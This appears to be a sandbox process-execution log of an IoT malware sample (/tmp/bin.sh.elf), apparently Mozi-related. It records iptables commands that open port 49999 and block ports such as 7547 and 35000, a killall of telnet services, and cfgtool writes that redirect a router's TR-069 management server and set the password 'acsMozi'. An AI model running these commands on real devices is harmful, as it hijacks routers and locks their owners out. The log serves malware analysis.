                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:36:48
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/bin/killall
                                                                        Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                        File size:32024 bytes
                                                                        MD5 hash:cd2adedbee501869ac691b88af39cd8b

                                                                        Start time (UTC):23:36:49
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:36:49
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:36:49
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --dport 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPT"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:05
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPT
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:36:54
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:36:59
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:04
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:09
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:10
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
                                                                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/bin/sh
                                                                        Arguments:-
                                                                        File size:129816 bytes
                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                        Start time (UTC):23:37:11
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/usr/sbin/iptables
                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                        File size:99296 bytes
                                                                        MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                        Start time (UTC):23:37:20
                                                                        Start date (UTC):05/12/2024
                                                                        Path:/tmp/bin.sh.elf
                                                                        Arguments:-
                                                                        File size:4956856 bytes
